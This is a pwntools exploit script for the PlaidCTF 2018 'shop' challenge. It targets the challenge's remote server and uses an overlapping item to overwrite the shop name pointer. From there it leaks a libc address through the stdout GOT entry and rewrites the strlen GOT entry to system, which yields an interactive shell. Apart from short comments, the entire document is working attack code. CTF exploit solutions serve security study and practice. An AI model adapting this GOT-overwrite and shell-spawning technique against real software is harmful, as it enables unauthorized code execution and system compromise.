PlaidCTF 2018 shop

shop.py

from pwn import *
from time import sleep
context.arch='amd64'

elf=ELF('./shop')
libc=ELF('./libc.so.6')

#  io=process('./shop',env={'LD_PRELOAD':'./libc.so.6'})
io=remote('shop.chal.pwning.xxx',9916)
#  io=remote('localhost',4000)

def menu(i):
    io.sendlineafter('>',i)

def add(now):
    menu('a')
    for _ in xrange(3):
        io.sendline(str(now))

def check():
    menu('c')
    io.sendline(cyclic(0x10000,alphabet="0123456789abcdef",n=4))
    sleep(1)

def ls():
    menu('l')

def name(name):
    menu('n')
    io.sendline(name)
# shop_name
io.sendlineafter(':','deadbeef')
# add 33 item
for i in xrange(33):
    add(i)
# item[32] will overlap shop name
check()
# item[32]->fd=leak-12
name(flat(elf.got['stdout']-12)+'uccu')
# leak
ls()
# get libc_base
leak=u64(io.recvrepeat(1).split('\n')[-2][:6]+'\x00\x00')
#  leak=u64(io.recvrepeat(1).split('\n')[-2][:3]+'\x00\x40\x00\x00\x00')
libc.address=leak-libc.symbols['_IO_2_1_stdout_']
log.info("libc@{}".format(hex(libc.address)))

io.sendline('')
# because uccu not in [0-9a-f]{4} item[32]=item[32]->fd (leak-12)
check()
# input from leak-12 to shop_name (to be got['strlen']-3)
name('A'*12+flat(libc.symbols['_IO_2_1_stdout_'],0,libc.symbols['_IO_2_1_stdin_'],0)+32*flat(0)+flat(elf.got['strlen']-3))
# strlen(buffer) -> system('sh')
name('sh\x00'+flat(libc.symbols['system']))
# getshell!
io.interactive()